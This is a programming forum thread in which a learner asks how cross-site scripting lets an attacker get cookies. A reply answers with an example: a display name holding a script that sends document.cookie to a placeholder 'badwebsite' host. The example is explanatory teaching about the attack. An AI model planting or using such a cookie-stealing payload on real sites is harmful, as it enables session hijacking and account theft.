Welcome to the Treehouse Community
Want to collaborate on code errors? Have bugs you need feedback on? Looking for an extra set of eyes on your latest project? Get support with fellow developers, designers, and programmers of all backgrounds and skill levels here with the Treehouse Community! While you're at it, check out some resources Treehouse students have shared here.
Looking to learn something new?
Treehouse offers a seven day free trial for new students. Get access to thousands of hours of content and join thousands of Treehouse students and alumni in the community today.
Start your free trialdaniellearman
208 PointsUsing XXS
How does the user get into the system inorder to know the cookies? Does he know the user preferences?
1 Answer
Brendan Whiting
Front End Web Development Techdegree Graduate 84,738 PointsLet’s say Treehouse had a vulnerability to XSS, and I was a hacker. I could change my name, from “Brendan”, to
“Brendan <script> window.location='http://badwebsite/?cookie='+document.cookie </script>”.
Then, when other users visit Treehouse, and they see posts I write on the forum, Treehouse would send a webpage to their browser with my name - but in this case, my name also has a script that will run in the users’s browser, it will access their cookie (document.cookie) and it will send them to my bad website along with the cookie data to my bad website’s server.
Kevin Gates
15,053 PointsKevin Gates
15,053 PointsIMO: "Best Answer" is above.